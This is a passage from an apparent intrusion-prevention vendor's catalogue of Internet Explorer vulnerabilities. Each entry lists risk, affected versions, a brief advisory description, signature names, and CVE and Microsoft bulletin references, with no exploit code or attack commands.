Situation: File-Text_Microsoft-Internet-Explorer-insertRow-Remote-Code-Execution
References:
CVE-2012-1880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1880
OSVDB-82870
http://www.osvdb.org/82870
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
Back to top

Microsoft-Internet-Explorer-Invalid-Pointer-Reference

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Internet Explorer. This vulnerability is also know with alias Aurora.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Invalid-Pointer-Reference
File-Text_Microsoft-Internet-Explorer-Invalid-Pointer-Reference
References:
CVE-2010-0249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249
BID-37815
http://www.securityfocus.com/bid/37815
OSVDB-61697
http://www.osvdb.org/61697
MS10-002
http://technet.microsoft.com/security/bulletin/MS10-002
Back to top

Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-293-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Input Validation
Description: A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an invalid pointer being used after an object is deleted. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target machine by enticing a user to open a specially crafted HTML document. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, and run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally, leading to a denial of service condition.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
File-Text_Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-0806
References:
CVE-2010-0806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806
BID-38615
http://www.securityfocus.com/bid/38615
OSVDB-62810
http://www.osvdb.org/62810
MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018
Back to top

Microsoft-Internet-Explorer-Isindex-Memory-Corruption

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles certain layout combinations. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user.
Situation: File-Text_Microsoft-Internet-Explorer-Isindex-Memory-Corruption
References:
CVE-2008-0076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0076
BID-27668
http://www.securityfocus.com/bid/27668
MS08-010
http://technet.microsoft.com/security/bulletin/MS08-010
Back to top

Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a race condition vulnerability in Microsoft Internet Explorer web browser. The vulnerability is due to the way Internet Explorer handles location DOM objects. A remote attacker may exploit this vulnerability by interrupting page loading in a way that would allow spoofing of the URL address bar and page properties, including SSL certificates. This would enable remote attackers to conduct phishing attacks on the vulnerable clients.
Situation: HTTP_Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition
File-Text_Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition
References:
CVE-2007-3091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3091
BID-24283
http://www.securityfocus.com/bid/24283
OSVDB-54944
http://www.osvdb.org/54944
MS09-019
http://technet.microsoft.com/security/bulletin/MS09-019
Back to top

Microsoft-Internet-Explorer-Jointostring-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-Jointostring-Type-Confusion
References:
CVE-2017-0130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0130
MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006
Back to top

Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows XP; Windows 2003; Windows 2008
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245
File-Text_Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245
References:
CVE-2011-1245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1245
BID-47192
http://www.securityfocus.com/bid/47192
MS11-018
http://technet.microsoft.com/security/bulletin/MS11-018
Back to top

Microsoft-Internet-Explorer-Jscript.dll-Regular-Expression-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a use after free vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Jscript.dll-Regular-Expression-Use-After-Free
References:
CVE-2015-2482
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2482
MS15-106
http://technet.microsoft.com/security/bulletin/MS15-106
Back to top

Microsoft-Internet-Explorer-Jscript9.dll-Typedarray-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a Use After Free vulnerability in Microsoft Internet Explorer. A remote attacker could use this to execute arbitrary code on the affected system.
Situation: File-Text_Microsoft-Internet-Explorer-Jscript9.dll-Typedarray-Use-After-Free
References:
CVE-2016-3210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3210
MS16-063
http://technet.microsoft.com/security/bulletin/MS16-063
Back to top

Microsoft-Internet-Explorer-Jserrortostring-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: There has been reported a heap buffer overflow vulnerability in Microsoft Internet Explorer. This vulnerability can be exploited by having a target user open maliciously crafted web page.
Situation: File-Text_Microsoft-Internet-Explorer-Jserrortostring-Heap-Buffer-Overflow
References:
CVE-2017-11810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11810
Back to top

Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption

About this vulnerability: Attempt to explot a vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an input validation weakness in how the vulnerable application handles HTML pages. Remote attackers can exploit this vulnerability by enticing target users to open a malicious webpage, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption-2
File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption-3
References:
CVE-2011-1260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1260
BID-48208
http://www.securityfocus.com/bid/48208
OSVDB-72950
http://www.osvdb.org/72950
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-Layout-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Layout-Use-After-Free
References:
CVE-2012-2548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2548
BID-55646
http://www.securityfocus.com/bid/55646
MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063
Back to top

Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows XP; Windows 2003; Windows 2008
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
File-Text_Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
File-Text_Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094-2
References:
CVE-2011-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0094
MS11-018
http://technet.microsoft.com/security/bulletin/MS11-018
Back to top

Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250
File-Text_Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250
References:
CVE-2011-1250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1250
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a vulnerability in Microsoft Internet Explorer. The vulnerability is due to an input validation error in assigning the location or location.href property of the window object. Successful exploitation can allow a remote attacker to execute arbitrary script code in a user's browser session in context of the trusted site and to access the content of a web page in a different domain.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting
File-Text_Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting
References:
CVE-2008-2947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2947
BID-29960
http://www.securityfocus.com/bid/29960
MS08-058
http://technet.microsoft.com/security/bulletin/MS08-058
Back to top

Microsoft-Internet-Explorer-Long-Url-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1406-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: A vulnerability has been reportedly introduced into certain versions of Microsoft Internet Explorer with the introduction of a security update. The vulnerability exists in the processing of compressed data used with the HTTP 1.1 protocol. An attacker could exploit this vulnerability to cause a denial of service condition or possibly inject and execute arbitrary code on a vulnerable host. Upon an unsuccessful code injection attack, the affected browser may terminate or display a warning message. The behaviour of the host system after an attack attempt resulting in arbitrary code injection and its subsequent execution is dependent on the intention of the injected code. It is likely that the vulnerable browser will stop functioning or terminate as a result.
Situation: HTTP_CSU-Microsoft-Internet-Explorer-Long-Url-Buffer-Overflow
References:
CVE-2006-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3869
BID-19667
http://www.securityfocus.com/bid/19667
OSVDB-28132
http://www.osvdb.org/28132
Back to top

Microsoft-Internet-Explorer-Loop-Counter-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer; Windows Server
Type: Malfunction
Description: A vulnerability exists Microsoft Internet Explorer, which can allow an attacker to corrupt memory. The vulnerability is due to an error in the way Internet Explorer accesses certain objects. A remote attacker can exploit this vulnerability by enticing a user to view a specially crafted web page or embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. Successful exploitation could result in code execution in the context of the currently logged in user.
Situation: File-Text_Microsoft-Internet-Explorer-Loop-Counter-Memory-Corruption
References:
CVE-2012-1522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1522
OSVDB-83653
http://www.osvdb.org/83653
MS12-044
http://technet.microsoft.com/security/bulletin/MS12-044
Back to top

Microsoft-Internet-Explorer-Malformed-BMP-File-Buffer-Overrun-Vulnerability

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: A vulnerability exists in Microsoft Internet Explorer (IE), which could allow a malicious user to execute arbitrary code when a specially crafted bitmap file is loaded by IE. The behaviour of the attack target varies according to the instructions in the malicious content on victim machine. Generally, Internet Explorer will crash immediately. In the worst case, the embedded shell code will be run on the target machine in the context of the currently logged in user.
Situation: File-Binary_Internet-Explorer-BMP-BOF
References:
CVE-2004-0566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0566
BID-9663
http://www.securityfocus.com/bid/9663
MS04-025
http://technet.microsoft.com/security/bulletin/MS04-025
Back to top

Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles Marquee objects. Remote attackers can exploit this vulnerability by enticing target users to open a crafted web page. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Internet Explorer may terminate abnormally.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
References:
CVE-2009-0554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0554
BID-34426
http://www.securityfocus.com/bid/34426
MS09-014
http://technet.microsoft.com/security/bulletin/MS09-014
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917
References:
CVE-2009-1917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1917
BID-35831
http://www.securityfocus.com/bid/35831
MS09-034
http://technet.microsoft.com/security/bulletin/MS09-034
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3123

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3123
References:
CVE-2013-3123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3123
BID-60392
http://www.securityfocus.com/bid/60392
OSVDB-94117
http://www.osvdb.org/94117
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3124

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3124
References:
CVE-2013-3124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3124
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3125

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3125
References:
CVE-2013-3125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3125
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3139

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3139
References:
CVE-2013-3139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3139
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5048

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5048
References:
CVE-2013-5048
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5048
MS13-097
http://technet.microsoft.com/security/bulletin/MS13-097
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: A memory corruption vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to errors while handling certain objects when processing HTML and script code. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to access a maliciously crafted website. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5049-2
References:
CVE-2013-5049
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5049
BID-64123
http://www.securityfocus.com/bid/64123
OSVDB-100754
http://www.osvdb.org/100754
MS13-097
http://technet.microsoft.com/security/bulletin/MS13-097
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5051

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5051
References:
CVE-2013-5051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5051
MS13-097
http://technet.microsoft.com/security/bulletin/MS13-097
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5052

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-555-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0
Type: Input Validation
Description: A use after free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to errors while handling certain objects when processing HTML and script code. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to access a maliciously crafted website. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-5052
References:
CVE-2013-5052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5052
BID-64124
http://www.securityfocus.com/bid/64124
OSVDB-100756
http://www.osvdb.org/100756
MS13-097
http://technet.microsoft.com/security/bulletin/MS13-097
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1762

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1762
References:
CVE-2014-1762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1762
BID-67511
http://www.securityfocus.com/bid/67511
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1766

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1766
References:
CVE-2014-1766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1766
BID-67518
http://www.securityfocus.com/bid/67518
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1785

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1785
References:
CVE-2014-1785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1785
BID-67878
http://www.securityfocus.com/bid/67878
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1789

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows RT; Windows 2008 R2; Windows 2012
Software: Internet Explorer 10.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1789
References:
CVE-2014-1789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1789
BID-67881
http://www.securityfocus.com/bid/67881
OSVDB-107866
http://www.osvdb.org/107866
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1791

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1791
References:
CVE-2014-1791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1791
BID-67884
http://www.securityfocus.com/bid/67884
OSVDB-107868
http://www.osvdb.org/107868
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1795

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1795
References:
CVE-2014-1795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1795
BID-67887
http://www.securityfocus.com/bid/67887
OSVDB-107871
http://www.osvdb.org/107871
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1800

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0; Internet Explorer 9.0; Internet Explorer 11.0; Internet Explorer 8.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1800
References:
CVE-2014-1800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1800
BID-67831
http://www.securityfocus.com/bid/67831
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1802

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1802
References:
CVE-2014-1802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1802
BID-67833
http://www.securityfocus.com/bid/67833
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1804

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-1804
References:
CVE-2014-1804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1804
BID-67835
http://www.securityfocus.com/bid/67835
OSVDB-107878
http://www.osvdb.org/107878
MS14-035
http://technet.microsoft.com/security/bulletin/MS14-035
Back to top

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2820

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows XP SP2; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2014-2820
References:
